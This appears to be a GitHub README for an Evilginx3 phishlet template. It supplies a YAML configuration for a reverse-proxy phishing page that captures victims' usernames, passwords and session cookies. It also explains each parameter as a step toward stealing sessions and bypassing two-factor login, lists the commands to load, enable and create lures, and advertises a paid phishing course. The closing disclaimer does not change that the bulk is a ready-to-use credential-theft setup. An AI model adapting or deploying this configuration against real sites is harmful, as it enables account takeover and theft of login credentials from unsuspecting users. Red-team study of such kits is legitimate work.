Evilginx Phishlet Template

name: 'Your First Phishlet'
author: 'Simpler Hacking'
min_ver: '3.2.0'

proxy_hosts:
  - { phish_sub: 'www', orig_sub: 'www', domain: '{domain}', session: true, is_landing: true }

sub_filters: 
  - { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['text/html', 'application/javascript', 'text/css', 'application/json', 'image/x-icon', 'text/plain', 'application/xml', 'image/*', 'font/*']} 
  - { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['application/x-www-form-urlencoded']}

auth_tokens:
  - domain: '{domain}'
    keys: ['session']

creds:
  - key: 'username'
    search: ['(.*)']
    type: 'post'
  - key: 'password'
    search: ['(.*)']
    type: 'post'

auth_urls:
  - url_regex: 'https://{hostname}/login'
    valid_statuses: [200]

login:
  username: user
  password: pass
  url: https://www.{domain}/login

# This is just a demo example of a phishlet for 3.2.0

# You can find phishlets here: https://github.com/simplerhacking/Evilginx3-Phishlets

Explanation of Phishlet Parameters:

• name: Identifies the name of the phishlet.
• author: Specifies the phishlet author.
• min_ver: Specifies the minimum Evilginx version that is compatible with your phishlet.
• proxy_hosts: Indicates the domain and subdomains to proxy. The phish_sub is the subdomain that the phishing page will imitate.
• sub_filters: Allows the phishlet to replace instances of the actual domain name with the phishing domain, which is critical for the phishing page to function correctly.
• auth_tokens: Identifies the cookies that should be captured from the victim's browser to gain access to the victim's session.
• creds: This field determines the credentials that the phishlet is engineered to steal. The key is the name of the credential (like username or password) and search is a regular expression that the program will use to identify and extract these details from the user's input.
• auth_urls: Defines the URLs that Evilginx will treat as the authenticated URLs. After the victim logs in, Evilginx will look out for a redirect to one of these URLs, at which point it will steal the listed auth_tokens.
• login: Here you specify the identifiers of the username and password fields in the login form on the original webpage. The url is the link of the page where the victim enters their credentials.
• force_post: If set to true, it forces the alteration of HTTP method from GET to POST.
• is_landing: If set to true, it means that the page is a landing page for the phishing attack.
• js_inject: This is where you can write some JavaScript to be injected in the webpage. It's typically used to enhance the phishing attack and ensure a smoother victim experience.
• domain: This is a template variable used to replace target hostname used in phishlet configuration.

Using Evilginx3 Phishlets

• Make sure the Evilginx3 is correctly set up on your machine
• ~/.evilginx/phishlets directory
• phishlets load
• phishlets enable
• lures create

Want ot learn to use Evilginx & bypass 2FA like a Professional?

Check out our new comprehensive course: -> Evilginx3 Pro Phishing Masterclass

Questions?

Send us an email to info@simplerhacking.com or message directly on our website www.simplerhacking.com

Evilginx3.Course.Preview.Github.mp4

Disclaimer

The tools here are intended solely for legal and ethical use by cybersecurity professionals in controlled environments. Any illegal or malicious use is strictly prohibited. I disclaim all responsibility for any harm, loss, or damage that may arise from improper use.